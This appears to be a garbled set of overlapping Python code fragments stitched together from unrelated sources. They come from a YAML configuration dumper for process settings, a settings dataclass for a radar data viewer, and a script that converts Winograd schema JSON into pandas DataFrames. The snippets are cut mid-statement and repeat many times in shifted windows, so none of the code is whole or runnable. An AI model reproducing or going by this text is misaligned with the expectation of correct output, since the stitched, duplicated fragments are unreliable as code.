'executable', x.pop('executable') yield", "v yaml.add_representer(Statedir, Dumper.statedir_repr, Dumper=Dumper) yaml.add_representer(Toplevel, Dumper.toplevel_repr, Dumper=Dumper) yaml.add_representer(List, Dumper.list_repr, Dumper=Dumper) yaml.add_representer(Map, Dumper.map_repr, Dumper=Dumper)", "yield 'user-id', x.pop('user-id') yield 'group-id', x.pop('group-id') yield 'environ', Map(x.pop('environ')) yield 'memory-limit', x.pop('memory-limit') yield", "try: from yaml import CSafeDumper as BaseDumper from yaml import CSafeLoader as BaseLoader", "value): return self.represent_sequence('tag:yaml.org,2002:seq', value, flow_style=False) def map_repr(self, value): return self.represent_mapping('tag:yaml.org,2002:map', sorted((k, Quoted(v)) for", "str(value), style='\"') class Loader(BaseLoader): pass class Statedir(object): pass # Formatting class List(list): pass", "Dumper=Dumper) yaml.add_representer(List, Dumper.list_repr, Dumper=Dumper) yaml.add_representer(Map, Dumper.map_repr, Dumper=Dumper) yaml.add_representer(Quoted, Dumper.quoted_repr, Dumper=Dumper) def unknown_type(loader, tag,", "x.pop('group-id') yield 'environ', Map(x.pop('environ')) yield 'memory-limit', x.pop('memory-limit') yield 'fileno-limit', x.pop('fileno-limit') yield 'cpu-shares', x.pop('cpu-shares')", "{ '__init__': lambda self, **kwargs: self.__dict__.update(kwargs), '__eq__': lambda self, other: self.__dict__ == other.__dict__,", "Dumper.map_repr, Dumper=Dumper) yaml.add_representer(Quoted, Dumper.quoted_repr, Dumper=Dumper) def unknown_type(loader, tag, node): if isinstance(node, yaml.MappingNode): typ", "value.__dict__) def toplevel_repr(self, value): return self.represent_mapping('tag:yaml.org,2002:map', value.format(), flow_style=False) def list_repr(self, value): return self.represent_sequence('tag:yaml.org,2002:seq',", "'group-id', x.pop('group-id') yield 'environ', Map(x.pop('environ')) yield 'memory-limit', x.pop('memory-limit') yield 'fileno-limit', x.pop('fileno-limit') yield 
'cpu-shares',", "class List(list): pass class Map(dict): pass class Quoted(str): pass class Toplevel(dict): def format(self):", "Dumper.toplevel_repr, Dumper=Dumper) yaml.add_representer(List, Dumper.list_repr, Dumper=Dumper) yaml.add_representer(Map, Dumper.map_repr, Dumper=Dumper) yaml.add_representer(Quoted, Dumper.quoted_repr, Dumper=Dumper) def unknown_type(loader,", "'user-id', x.pop('user-id') yield 'group-id', x.pop('group-id') yield 'environ', Map(x.pop('environ')) yield 'memory-limit', x.pop('memory-limit') yield 'fileno-limit',", "Loader(BaseLoader): pass class Statedir(object): pass # Formatting class List(list): pass class Map(dict): pass", "'kind', x.pop('kind') yield 'user-id', x.pop('user-id') yield 'group-id', x.pop('group-id') yield 'environ', Map(x.pop('environ')) yield 'memory-limit',", "flow_style=False) def map_repr(self, value): return self.represent_mapping('tag:yaml.org,2002:map', sorted((k, Quoted(v)) for k, v in value.items()),", "'environ', Map(x.pop('environ')) yield 'memory-limit', x.pop('memory-limit') yield 'fileno-limit', x.pop('fileno-limit') yield 'cpu-shares', x.pop('cpu-shares') yield 'workdir',", "import CSafeDumper as BaseDumper from yaml import CSafeLoader as BaseLoader except ImportError: from" ]
[ "tuple = (0.05, 0.05, 0.08, 1.0) canvas_dark_mode_clear_color: tuple = (0.05, 0.05, 0.08, 1.0)", "str = \":/dark/stylesheet.qss\" light_stylesheet: str = \":/light/stylesheet.qss\" canvas_light_mode_clear_color: tuple = (0.05, 0.05, 0.08,", "\":/dark/stylesheet.qss\" light_stylesheet: str = \":/light/stylesheet.qss\" canvas_light_mode_clear_color: tuple = (0.05, 0.05, 0.08, 1.0) canvas_dark_mode_clear_color:", "= \":/dark/stylesheet.qss\" light_stylesheet: str = \":/light/stylesheet.qss\" canvas_light_mode_clear_color: tuple = (0.05, 0.05, 0.08, 1.0)", "canvas_light_mode_clear_color: tuple = (0.05, 0.05, 0.08, 1.0) canvas_dark_mode_clear_color: tuple = (0.05, 0.05, 0.08,", "python # -*- coding: utf-8 -*- \"\"\"Settings dataclass. Holds settings for the visualization", "bool = True dark_stylesheet: str = \":/dark/stylesheet.qss\" light_stylesheet: str = \":/light/stylesheet.qss\" canvas_light_mode_clear_color: tuple", "True dark_stylesheet: str = \":/dark/stylesheet.qss\" light_stylesheet: str = \":/light/stylesheet.qss\" canvas_light_mode_clear_color: tuple = (0.05,", "dataclass. Holds settings for the visualization tool during runtime. \"\"\" from dataclasses import", "1.0) canvas_dark_mode_clear_color: tuple = (0.05, 0.05, 0.08, 1.0) grid_circle_color: tuple = (0.15, 0.15,", "0.05, 0.08, 1.0) canvas_dark_mode_clear_color: tuple = (0.05, 0.05, 0.08, 1.0) grid_circle_color: tuple =", "light_stylesheet: str = \":/light/stylesheet.qss\" canvas_light_mode_clear_color: tuple = (0.05, 0.05, 0.08, 1.0) canvas_dark_mode_clear_color: tuple", "import dataclass @dataclass class Settings: program_title: str = \"Radar Data Viewer\" dark_mode: bool", "the visualization tool during runtime. \"\"\" from dataclasses import dataclass @dataclass class Settings:", "\"\"\"Settings dataclass. Holds settings for the visualization tool during runtime. 
\"\"\" from dataclasses", "(0.05, 0.05, 0.08, 1.0) canvas_dark_mode_clear_color: tuple = (0.05, 0.05, 0.08, 1.0) grid_circle_color: tuple", "grid_circle_color: tuple = (0.15, 0.15, 0.18, 1.0) doppler_arrow_scale: float = 0.2 draw_doppler_arrows: bool", "-*- \"\"\"Settings dataclass. Holds settings for the visualization tool during runtime. \"\"\" from", "0.08, 1.0) grid_circle_color: tuple = (0.15, 0.15, 0.18, 1.0) doppler_arrow_scale: float = 0.2", "dataclass @dataclass class Settings: program_title: str = \"Radar Data Viewer\" dark_mode: bool =", "1.0) grid_circle_color: tuple = (0.15, 0.15, 0.18, 1.0) doppler_arrow_scale: float = 0.2 draw_doppler_arrows:", "str = \":/light/stylesheet.qss\" canvas_light_mode_clear_color: tuple = (0.05, 0.05, 0.08, 1.0) canvas_dark_mode_clear_color: tuple =", "for the visualization tool during runtime. \"\"\" from dataclasses import dataclass @dataclass class", "dark_stylesheet: str = \":/dark/stylesheet.qss\" light_stylesheet: str = \":/light/stylesheet.qss\" canvas_light_mode_clear_color: tuple = (0.05, 0.05,", "str = \"Radar Data Viewer\" dark_mode: bool = True dark_stylesheet: str = \":/dark/stylesheet.qss\"", "dataclasses import dataclass @dataclass class Settings: program_title: str = \"Radar Data Viewer\" dark_mode:", "0.05, 0.08, 1.0) grid_circle_color: tuple = (0.15, 0.15, 0.18, 1.0) doppler_arrow_scale: float =", "Viewer\" dark_mode: bool = True dark_stylesheet: str = \":/dark/stylesheet.qss\" light_stylesheet: str = \":/light/stylesheet.qss\"", "0.08, 1.0) canvas_dark_mode_clear_color: tuple = (0.05, 0.05, 0.08, 1.0) grid_circle_color: tuple = (0.15,", "\"Radar Data Viewer\" dark_mode: bool = True dark_stylesheet: str = \":/dark/stylesheet.qss\" light_stylesheet: str", "visualization tool during runtime. \"\"\" from dataclasses import dataclass @dataclass class Settings: program_title:", "Holds settings for the visualization tool during runtime. 
\"\"\" from dataclasses import dataclass", "dark_mode: bool = True dark_stylesheet: str = \":/dark/stylesheet.qss\" light_stylesheet: str = \":/light/stylesheet.qss\" canvas_light_mode_clear_color:", "#!/usr/bin/env python # -*- coding: utf-8 -*- \"\"\"Settings dataclass. Holds settings for the", "tuple = (0.05, 0.05, 0.08, 1.0) grid_circle_color: tuple = (0.15, 0.15, 0.18, 1.0)", "= (0.15, 0.15, 0.18, 1.0) doppler_arrow_scale: float = 0.2 draw_doppler_arrows: bool = True", "tuple = (0.15, 0.15, 0.18, 1.0) doppler_arrow_scale: float = 0.2 draw_doppler_arrows: bool =", "= (0.05, 0.05, 0.08, 1.0) canvas_dark_mode_clear_color: tuple = (0.05, 0.05, 0.08, 1.0) grid_circle_color:", "= (0.05, 0.05, 0.08, 1.0) grid_circle_color: tuple = (0.15, 0.15, 0.18, 1.0) doppler_arrow_scale:", "= True dark_stylesheet: str = \":/dark/stylesheet.qss\" light_stylesheet: str = \":/light/stylesheet.qss\" canvas_light_mode_clear_color: tuple =", "utf-8 -*- \"\"\"Settings dataclass. Holds settings for the visualization tool during runtime. \"\"\"", "tool during runtime. \"\"\" from dataclasses import dataclass @dataclass class Settings: program_title: str", "from dataclasses import dataclass @dataclass class Settings: program_title: str = \"Radar Data Viewer\"", "during runtime. \"\"\" from dataclasses import dataclass @dataclass class Settings: program_title: str =", "settings for the visualization tool during runtime. 
\"\"\" from dataclasses import dataclass @dataclass", "@dataclass class Settings: program_title: str = \"Radar Data Viewer\" dark_mode: bool = True", "program_title: str = \"Radar Data Viewer\" dark_mode: bool = True dark_stylesheet: str =", "\"\"\" from dataclasses import dataclass @dataclass class Settings: program_title: str = \"Radar Data", "Data Viewer\" dark_mode: bool = True dark_stylesheet: str = \":/dark/stylesheet.qss\" light_stylesheet: str =", "canvas_dark_mode_clear_color: tuple = (0.05, 0.05, 0.08, 1.0) grid_circle_color: tuple = (0.15, 0.15, 0.18,", "= \":/light/stylesheet.qss\" canvas_light_mode_clear_color: tuple = (0.05, 0.05, 0.08, 1.0) canvas_dark_mode_clear_color: tuple = (0.05,", "\":/light/stylesheet.qss\" canvas_light_mode_clear_color: tuple = (0.05, 0.05, 0.08, 1.0) canvas_dark_mode_clear_color: tuple = (0.05, 0.05,", "Settings: program_title: str = \"Radar Data Viewer\" dark_mode: bool = True dark_stylesheet: str", "(0.05, 0.05, 0.08, 1.0) grid_circle_color: tuple = (0.15, 0.15, 0.18, 1.0) doppler_arrow_scale: float", "coding: utf-8 -*- \"\"\"Settings dataclass. Holds settings for the visualization tool during runtime.", "-*- coding: utf-8 -*- \"\"\"Settings dataclass. Holds settings for the visualization tool during", "class Settings: program_title: str = \"Radar Data Viewer\" dark_mode: bool = True dark_stylesheet:", "= \"Radar Data Viewer\" dark_mode: bool = True dark_stylesheet: str = \":/dark/stylesheet.qss\" light_stylesheet:", "runtime. \"\"\" from dataclasses import dataclass @dataclass class Settings: program_title: str = \"Radar", "# -*- coding: utf-8 -*- \"\"\"Settings dataclass. Holds settings for the visualization tool" ]
[ "'correct_switched', 'incorrect_switched', 'is_switchable', 'is_associative', 'translated']) return df def generate_json(df): json_rows = [] for", "else wsc_json[i+1]['substitution'] # noqa E226 correct_sentence = correct_sentence.replace('recieved', 'received') incorrect_sentence = incorrect_sentence.replace('recieved', 'received')", "pandas as pd from src.helpers.consts import WINOGRAD_SCHEMAS_FILE, WINOGRAD_SCHEMAS_ORIGINAL_FILE def generate_df_from_original_json(): with open(WINOGRAD_SCHEMAS_ORIGINAL_FILE, 'r',", "row.is_associative dic['is_switchable'] = False if 'is_switchable' not in row else row.is_switchable if dic['is_switchable']", "with open(WINOGRAD_SCHEMAS_FILE, 'r', encoding='utf-8') as fp: wsc_json = json.load(fp) rows = [] for", "E226 incorrect_sentence = wsc_json[i]['substitution'] if not wsc_json[i]['correctness'] \\ else wsc_json[i+1]['substitution'] # noqa E226", "'manually_fixed_incorrect_sentence': row.manually_fixed_incorrect_sentence, 'correct_switched': row.manually_fixed_correct_switched, 'incorrect_switched': row.manually_fixed_incorrect_switched} dic['is_associative'] = False if 'is_associative' not in", "= False if 'is_switchable' not in row else row.is_switchable if dic['is_switchable'] and dic['correct_switched']", "'incorrect_switched', 'is_switchable', 'is_associative', 'translated']) return df def generate_json(df): json_rows = [] for index,", "generate_df_from_original_json(): with open(WINOGRAD_SCHEMAS_ORIGINAL_FILE, 'r', encoding='utf-8') as fp: wsc_json = json.load(fp) rows = []", "json.load(fp) rows = [] for i in range(len(wsc_json)): rows.append([wsc_json[i]['correct_sentence'], wsc_json[i]['incorrect_sentence'], wsc_json[i]['manually_fixed_correct_sentence'], wsc_json[i]['manually_fixed_incorrect_sentence'], wsc_json[i]['correct_switched'],", "as fp: wsc_json = json.load(fp) rows = [] for i in range(0, len(wsc_json),", "in row else row.is_associative dic['is_switchable'] = False if 'is_switchable' not in row else", "False 
if 'is_associative' not in row else row.is_associative dic['is_switchable'] = False if 'is_switchable'", "wsc_json[i]['is_associative'], wsc_json[i]['translated']]) df = pd.DataFrame(rows, columns=['correct_sentence', 'incorrect_sentence', 'manually_fixed_correct_sentence', 'manually_fixed_incorrect_sentence', 'correct_switched', 'incorrect_switched', 'is_switchable', 'is_associative',", "in df.iterrows(): dic = {'question_id': index, 'correct_sentence': row.correct_sentence, 'incorrect_sentence': row.incorrect_sentence, 'manually_fixed_correct_sentence': row.manually_fixed_correct_sentence, 'manually_fixed_incorrect_sentence':", "= correct_sentence.replace('recieved', 'received') incorrect_sentence = incorrect_sentence.replace('recieved', 'received') rows.append([correct_sentence, incorrect_sentence]) df = pd.DataFrame(rows, columns=['correct_sentence',", "rows.append([correct_sentence, incorrect_sentence]) df = pd.DataFrame(rows, columns=['correct_sentence', 'incorrect_sentence']) return df def generate_df_from_json(): with open(WINOGRAD_SCHEMAS_FILE,", "dic = {'question_id': index, 'correct_sentence': row.correct_sentence, 'incorrect_sentence': row.incorrect_sentence, 'manually_fixed_correct_sentence': row.manually_fixed_correct_sentence, 'manually_fixed_incorrect_sentence': row.manually_fixed_incorrect_sentence, 'correct_switched':", "row.incorrect_switched dic['translated'] = row.translated json_rows.append(dic) with open(WINOGRAD_SCHEMAS_FILE, 'w') as outfile: json.dump(json_rows, outfile, ensure_ascii=False,", "noqa E226 correct_sentence = correct_sentence.replace('recieved', 'received') incorrect_sentence = incorrect_sentence.replace('recieved', 'received') rows.append([correct_sentence, incorrect_sentence]) df", "row.is_switchable if dic['is_switchable'] and dic['correct_switched'] == '': dic['correct_switched'] = row.correct_switched dic['incorrect_switched'] = row.incorrect_switched", "open(WINOGRAD_SCHEMAS_FILE, 'r', encoding='utf-8') as fp: wsc_json = 
json.load(fp) rows = [] for i", "for i in range(0, len(wsc_json), 2): correct_sentence = wsc_json[i]['substitution'] if wsc_json[i]['correctness'] \\ else", "= wsc_json[i]['substitution'] if not wsc_json[i]['correctness'] \\ else wsc_json[i+1]['substitution'] # noqa E226 correct_sentence =", "not in row else row.is_switchable if dic['is_switchable'] and dic['correct_switched'] == '': dic['correct_switched'] =", "False if 'is_switchable' not in row else row.is_switchable if dic['is_switchable'] and dic['correct_switched'] ==", "rows = [] for i in range(0, len(wsc_json), 2): correct_sentence = wsc_json[i]['substitution'] if", "correct_sentence = wsc_json[i]['substitution'] if wsc_json[i]['correctness'] \\ else wsc_json[i+1]['substitution'] # noqa E226 incorrect_sentence =", "incorrect_sentence]) df = pd.DataFrame(rows, columns=['correct_sentence', 'incorrect_sentence']) return df def generate_df_from_json(): with open(WINOGRAD_SCHEMAS_FILE, 'r',", "row.manually_fixed_correct_switched, 'incorrect_switched': row.manually_fixed_incorrect_switched} dic['is_associative'] = False if 'is_associative' not in row else row.is_associative", "from src.helpers.consts import WINOGRAD_SCHEMAS_FILE, WINOGRAD_SCHEMAS_ORIGINAL_FILE def generate_df_from_original_json(): with open(WINOGRAD_SCHEMAS_ORIGINAL_FILE, 'r', encoding='utf-8') as fp:", "in range(0, len(wsc_json), 2): correct_sentence = wsc_json[i]['substitution'] if wsc_json[i]['correctness'] \\ else wsc_json[i+1]['substitution'] #", "'incorrect_sentence']) return df def generate_df_from_json(): with open(WINOGRAD_SCHEMAS_FILE, 'r', encoding='utf-8') as fp: wsc_json =", "len(wsc_json), 2): correct_sentence = wsc_json[i]['substitution'] if wsc_json[i]['correctness'] \\ else wsc_json[i+1]['substitution'] # noqa E226", "wsc_json[i]['substitution'] if wsc_json[i]['correctness'] \\ else wsc_json[i+1]['substitution'] # noqa E226 incorrect_sentence = wsc_json[i]['substitution'] if", "rows.append([wsc_json[i]['correct_sentence'], 
wsc_json[i]['incorrect_sentence'], wsc_json[i]['manually_fixed_correct_sentence'], wsc_json[i]['manually_fixed_incorrect_sentence'], wsc_json[i]['correct_switched'], wsc_json[i]['incorrect_switched'], wsc_json[i]['is_switchable'], wsc_json[i]['is_associative'], wsc_json[i]['translated']]) df = pd.DataFrame(rows, columns=['correct_sentence',", "= [] for index, row in df.iterrows(): dic = {'question_id': index, 'correct_sentence': row.correct_sentence,", "encoding='utf-8') as fp: wsc_json = json.load(fp) rows = [] for i in range(0,", "if 'is_switchable' not in row else row.is_switchable if dic['is_switchable'] and dic['correct_switched'] == '':", "= incorrect_sentence.replace('recieved', 'received') rows.append([correct_sentence, incorrect_sentence]) df = pd.DataFrame(rows, columns=['correct_sentence', 'incorrect_sentence']) return df def", "if 'is_associative' not in row else row.is_associative dic['is_switchable'] = False if 'is_switchable' not", "row else row.is_associative dic['is_switchable'] = False if 'is_switchable' not in row else row.is_switchable", "if dic['is_switchable'] and dic['correct_switched'] == '': dic['correct_switched'] = row.correct_switched dic['incorrect_switched'] = row.incorrect_switched dic['translated']", "in range(len(wsc_json)): rows.append([wsc_json[i]['correct_sentence'], wsc_json[i]['incorrect_sentence'], wsc_json[i]['manually_fixed_correct_sentence'], wsc_json[i]['manually_fixed_incorrect_sentence'], wsc_json[i]['correct_switched'], wsc_json[i]['incorrect_switched'], wsc_json[i]['is_switchable'], wsc_json[i]['is_associative'], wsc_json[i]['translated']]) df =", "import WINOGRAD_SCHEMAS_FILE, WINOGRAD_SCHEMAS_ORIGINAL_FILE def generate_df_from_original_json(): with open(WINOGRAD_SCHEMAS_ORIGINAL_FILE, 'r', encoding='utf-8') as fp: wsc_json =", "E226 correct_sentence = correct_sentence.replace('recieved', 'received') incorrect_sentence = incorrect_sentence.replace('recieved', 'received') rows.append([correct_sentence, 
incorrect_sentence]) df =", "df def generate_json(df): json_rows = [] for index, row in df.iterrows(): dic =", "[] for index, row in df.iterrows(): dic = {'question_id': index, 'correct_sentence': row.correct_sentence, 'incorrect_sentence':", "'manually_fixed_correct_sentence': row.manually_fixed_correct_sentence, 'manually_fixed_incorrect_sentence': row.manually_fixed_incorrect_sentence, 'correct_switched': row.manually_fixed_correct_switched, 'incorrect_switched': row.manually_fixed_incorrect_switched} dic['is_associative'] = False if 'is_associative'", "not in row else row.is_associative dic['is_switchable'] = False if 'is_switchable' not in row", "if not wsc_json[i]['correctness'] \\ else wsc_json[i+1]['substitution'] # noqa E226 correct_sentence = correct_sentence.replace('recieved', 'received')", "'is_switchable' not in row else row.is_switchable if dic['is_switchable'] and dic['correct_switched'] == '': dic['correct_switched']", "== '': dic['correct_switched'] = row.correct_switched dic['incorrect_switched'] = row.incorrect_switched dic['translated'] = row.translated json_rows.append(dic) with", "wsc_json[i]['manually_fixed_correct_sentence'], wsc_json[i]['manually_fixed_incorrect_sentence'], wsc_json[i]['correct_switched'], wsc_json[i]['incorrect_switched'], wsc_json[i]['is_switchable'], wsc_json[i]['is_associative'], wsc_json[i]['translated']]) df = pd.DataFrame(rows, columns=['correct_sentence', 'incorrect_sentence', 'manually_fixed_correct_sentence',", "row.manually_fixed_incorrect_sentence, 'correct_switched': row.manually_fixed_correct_switched, 'incorrect_switched': row.manually_fixed_incorrect_switched} dic['is_associative'] = False if 'is_associative' not in row", "wsc_json[i]['incorrect_switched'], wsc_json[i]['is_switchable'], wsc_json[i]['is_associative'], wsc_json[i]['translated']]) df = pd.DataFrame(rows, columns=['correct_sentence', 'incorrect_sentence', 'manually_fixed_correct_sentence', 'manually_fixed_incorrect_sentence', 
'correct_switched', 'incorrect_switched',", "return df def generate_df_from_json(): with open(WINOGRAD_SCHEMAS_FILE, 'r', encoding='utf-8') as fp: wsc_json = json.load(fp)", "wsc_json = json.load(fp) rows = [] for i in range(0, len(wsc_json), 2): correct_sentence", "\\ else wsc_json[i+1]['substitution'] # noqa E226 incorrect_sentence = wsc_json[i]['substitution'] if not wsc_json[i]['correctness'] \\", "row.manually_fixed_incorrect_switched} dic['is_associative'] = False if 'is_associative' not in row else row.is_associative dic['is_switchable'] =", "'incorrect_sentence', 'manually_fixed_correct_sentence', 'manually_fixed_incorrect_sentence', 'correct_switched', 'incorrect_switched', 'is_switchable', 'is_associative', 'translated']) return df def generate_json(df): json_rows", "'is_associative' not in row else row.is_associative dic['is_switchable'] = False if 'is_switchable' not in", "df def generate_df_from_json(): with open(WINOGRAD_SCHEMAS_FILE, 'r', encoding='utf-8') as fp: wsc_json = json.load(fp) rows", "i in range(0, len(wsc_json), 2): correct_sentence = wsc_json[i]['substitution'] if wsc_json[i]['correctness'] \\ else wsc_json[i+1]['substitution']", "pd.DataFrame(rows, columns=['correct_sentence', 'incorrect_sentence', 'manually_fixed_correct_sentence', 'manually_fixed_incorrect_sentence', 'correct_switched', 'incorrect_switched', 'is_switchable', 'is_associative', 'translated']) return df def", "index, 'correct_sentence': row.correct_sentence, 'incorrect_sentence': row.incorrect_sentence, 'manually_fixed_correct_sentence': row.manually_fixed_correct_sentence, 'manually_fixed_incorrect_sentence': row.manually_fixed_incorrect_sentence, 'correct_switched': row.manually_fixed_correct_switched, 'incorrect_switched': row.manually_fixed_incorrect_switched}", "= row.correct_switched dic['incorrect_switched'] = row.incorrect_switched dic['translated'] = row.translated json_rows.append(dic) with open(WINOGRAD_SCHEMAS_FILE, 'w') as", "dic['is_switchable'] and 
dic['correct_switched'] == '': dic['correct_switched'] = row.correct_switched dic['incorrect_switched'] = row.incorrect_switched dic['translated'] =", "= [] for i in range(0, len(wsc_json), 2): correct_sentence = wsc_json[i]['substitution'] if wsc_json[i]['correctness']", "wsc_json[i]['incorrect_sentence'], wsc_json[i]['manually_fixed_correct_sentence'], wsc_json[i]['manually_fixed_incorrect_sentence'], wsc_json[i]['correct_switched'], wsc_json[i]['incorrect_switched'], wsc_json[i]['is_switchable'], wsc_json[i]['is_associative'], wsc_json[i]['translated']]) df = pd.DataFrame(rows, columns=['correct_sentence', 'incorrect_sentence',", "= pd.DataFrame(rows, columns=['correct_sentence', 'incorrect_sentence', 'manually_fixed_correct_sentence', 'manually_fixed_incorrect_sentence', 'correct_switched', 'incorrect_switched', 'is_switchable', 'is_associative', 'translated']) return df", "row.manually_fixed_correct_sentence, 'manually_fixed_incorrect_sentence': row.manually_fixed_incorrect_sentence, 'correct_switched': row.manually_fixed_correct_switched, 'incorrect_switched': row.manually_fixed_incorrect_switched} dic['is_associative'] = False if 'is_associative' not", "2): correct_sentence = wsc_json[i]['substitution'] if wsc_json[i]['correctness'] \\ else wsc_json[i+1]['substitution'] # noqa E226 incorrect_sentence", "wsc_json[i+1]['substitution'] # noqa E226 incorrect_sentence = wsc_json[i]['substitution'] if not wsc_json[i]['correctness'] \\ else wsc_json[i+1]['substitution']", "wsc_json[i]['substitution'] if not wsc_json[i]['correctness'] \\ else wsc_json[i+1]['substitution'] # noqa E226 correct_sentence = correct_sentence.replace('recieved',", "for i in range(len(wsc_json)): rows.append([wsc_json[i]['correct_sentence'], wsc_json[i]['incorrect_sentence'], wsc_json[i]['manually_fixed_correct_sentence'], wsc_json[i]['manually_fixed_incorrect_sentence'], wsc_json[i]['correct_switched'], wsc_json[i]['incorrect_switched'], wsc_json[i]['is_switchable'], 
wsc_json[i]['is_associative'], wsc_json[i]['translated']])", "import pandas as pd from src.helpers.consts import WINOGRAD_SCHEMAS_FILE, WINOGRAD_SCHEMAS_ORIGINAL_FILE def generate_df_from_original_json(): with open(WINOGRAD_SCHEMAS_ORIGINAL_FILE,", "{'question_id': index, 'correct_sentence': row.correct_sentence, 'incorrect_sentence': row.incorrect_sentence, 'manually_fixed_correct_sentence': row.manually_fixed_correct_sentence, 'manually_fixed_incorrect_sentence': row.manually_fixed_incorrect_sentence, 'correct_switched': row.manually_fixed_correct_switched, 'incorrect_switched':", "WINOGRAD_SCHEMAS_FILE, WINOGRAD_SCHEMAS_ORIGINAL_FILE def generate_df_from_original_json(): with open(WINOGRAD_SCHEMAS_ORIGINAL_FILE, 'r', encoding='utf-8') as fp: wsc_json = json.load(fp)", "json.load(fp) rows = [] for i in range(0, len(wsc_json), 2): correct_sentence = wsc_json[i]['substitution']", "wsc_json[i]['manually_fixed_incorrect_sentence'], wsc_json[i]['correct_switched'], wsc_json[i]['incorrect_switched'], wsc_json[i]['is_switchable'], wsc_json[i]['is_associative'], wsc_json[i]['translated']]) df = pd.DataFrame(rows, columns=['correct_sentence', 'incorrect_sentence', 'manually_fixed_correct_sentence', 'manually_fixed_incorrect_sentence',", "'correct_switched': row.manually_fixed_correct_switched, 'incorrect_switched': row.manually_fixed_incorrect_switched} dic['is_associative'] = False if 'is_associative' not in row else", "fp: wsc_json = json.load(fp) rows = [] for i in range(len(wsc_json)): rows.append([wsc_json[i]['correct_sentence'], wsc_json[i]['incorrect_sentence'],", "if wsc_json[i]['correctness'] \\ else wsc_json[i+1]['substitution'] # noqa E226 incorrect_sentence = wsc_json[i]['substitution'] if not", "generate_df_from_json(): with open(WINOGRAD_SCHEMAS_FILE, 'r', encoding='utf-8') as fp: wsc_json = json.load(fp) rows = []", "= wsc_json[i]['substitution'] if wsc_json[i]['correctness'] \\ else wsc_json[i+1]['substitution'] # noqa E226 incorrect_sentence = 
wsc_json[i]['substitution']", "encoding='utf-8') as fp: wsc_json = json.load(fp) rows = [] for i in range(len(wsc_json)):", "wsc_json[i]['translated']]) df = pd.DataFrame(rows, columns=['correct_sentence', 'incorrect_sentence', 'manually_fixed_correct_sentence', 'manually_fixed_incorrect_sentence', 'correct_switched', 'incorrect_switched', 'is_switchable', 'is_associative', 'translated'])", "= pd.DataFrame(rows, columns=['correct_sentence', 'incorrect_sentence']) return df def generate_df_from_json(): with open(WINOGRAD_SCHEMAS_FILE, 'r', encoding='utf-8') as", "def generate_df_from_json(): with open(WINOGRAD_SCHEMAS_FILE, 'r', encoding='utf-8') as fp: wsc_json = json.load(fp) rows =", "[] for i in range(len(wsc_json)): rows.append([wsc_json[i]['correct_sentence'], wsc_json[i]['incorrect_sentence'], wsc_json[i]['manually_fixed_correct_sentence'], wsc_json[i]['manually_fixed_incorrect_sentence'], wsc_json[i]['correct_switched'], wsc_json[i]['incorrect_switched'], wsc_json[i]['is_switchable'], wsc_json[i]['is_associative'],", "incorrect_sentence.replace('recieved', 'received') rows.append([correct_sentence, incorrect_sentence]) df = pd.DataFrame(rows, columns=['correct_sentence', 'incorrect_sentence']) return df def generate_df_from_json():", "i in range(len(wsc_json)): rows.append([wsc_json[i]['correct_sentence'], wsc_json[i]['incorrect_sentence'], wsc_json[i]['manually_fixed_correct_sentence'], wsc_json[i]['manually_fixed_incorrect_sentence'], wsc_json[i]['correct_switched'], wsc_json[i]['incorrect_switched'], wsc_json[i]['is_switchable'], wsc_json[i]['is_associative'], wsc_json[i]['translated']]) df", "= row.incorrect_switched dic['translated'] = row.translated json_rows.append(dic) with open(WINOGRAD_SCHEMAS_FILE, 'w') as outfile: json.dump(json_rows, outfile,", "df = pd.DataFrame(rows, columns=['correct_sentence', 'incorrect_sentence']) return df def generate_df_from_json(): with open(WINOGRAD_SCHEMAS_FILE, 'r', encoding='utf-8')", "'r', encoding='utf-8') as fp: 
wsc_json = json.load(fp) rows = [] for i in", "import json import pandas as pd from src.helpers.consts import WINOGRAD_SCHEMAS_FILE, WINOGRAD_SCHEMAS_ORIGINAL_FILE def generate_df_from_original_json():", "json_rows = [] for index, row in df.iterrows(): dic = {'question_id': index, 'correct_sentence':", "'correct_sentence': row.correct_sentence, 'incorrect_sentence': row.incorrect_sentence, 'manually_fixed_correct_sentence': row.manually_fixed_correct_sentence, 'manually_fixed_incorrect_sentence': row.manually_fixed_incorrect_sentence, 'correct_switched': row.manually_fixed_correct_switched, 'incorrect_switched': row.manually_fixed_incorrect_switched} dic['is_associative']", "wsc_json = json.load(fp) rows = [] for i in range(len(wsc_json)): rows.append([wsc_json[i]['correct_sentence'], wsc_json[i]['incorrect_sentence'], wsc_json[i]['manually_fixed_correct_sentence'],", "for index, row in df.iterrows(): dic = {'question_id': index, 'correct_sentence': row.correct_sentence, 'incorrect_sentence': row.incorrect_sentence,", "incorrect_sentence = incorrect_sentence.replace('recieved', 'received') rows.append([correct_sentence, incorrect_sentence]) df = pd.DataFrame(rows, columns=['correct_sentence', 'incorrect_sentence']) return df", "generate_json(df): json_rows = [] for index, row in df.iterrows(): dic = {'question_id': index,", "range(len(wsc_json)): rows.append([wsc_json[i]['correct_sentence'], wsc_json[i]['incorrect_sentence'], wsc_json[i]['manually_fixed_correct_sentence'], wsc_json[i]['manually_fixed_incorrect_sentence'], wsc_json[i]['correct_switched'], wsc_json[i]['incorrect_switched'], wsc_json[i]['is_switchable'], wsc_json[i]['is_associative'], wsc_json[i]['translated']]) df = pd.DataFrame(rows,", "'manually_fixed_incorrect_sentence', 'correct_switched', 'incorrect_switched', 'is_switchable', 'is_associative', 'translated']) return df def generate_json(df): json_rows = []", "[] for i in range(0, len(wsc_json), 2): correct_sentence = wsc_json[i]['substitution'] 
if wsc_json[i]['correctness'] \\", "correct_sentence = correct_sentence.replace('recieved', 'received') incorrect_sentence = incorrect_sentence.replace('recieved', 'received') rows.append([correct_sentence, incorrect_sentence]) df = pd.DataFrame(rows,", "= {'question_id': index, 'correct_sentence': row.correct_sentence, 'incorrect_sentence': row.incorrect_sentence, 'manually_fixed_correct_sentence': row.manually_fixed_correct_sentence, 'manually_fixed_incorrect_sentence': row.manually_fixed_incorrect_sentence, 'correct_switched': row.manually_fixed_correct_switched,", "'is_associative', 'translated']) return df def generate_json(df): json_rows = [] for index, row in", "open(WINOGRAD_SCHEMAS_ORIGINAL_FILE, 'r', encoding='utf-8') as fp: wsc_json = json.load(fp) rows = [] for i", "wsc_json[i]['correct_switched'], wsc_json[i]['incorrect_switched'], wsc_json[i]['is_switchable'], wsc_json[i]['is_associative'], wsc_json[i]['translated']]) df = pd.DataFrame(rows, columns=['correct_sentence', 'incorrect_sentence', 'manually_fixed_correct_sentence', 'manually_fixed_incorrect_sentence', 'correct_switched',", "'incorrect_sentence': row.incorrect_sentence, 'manually_fixed_correct_sentence': row.manually_fixed_correct_sentence, 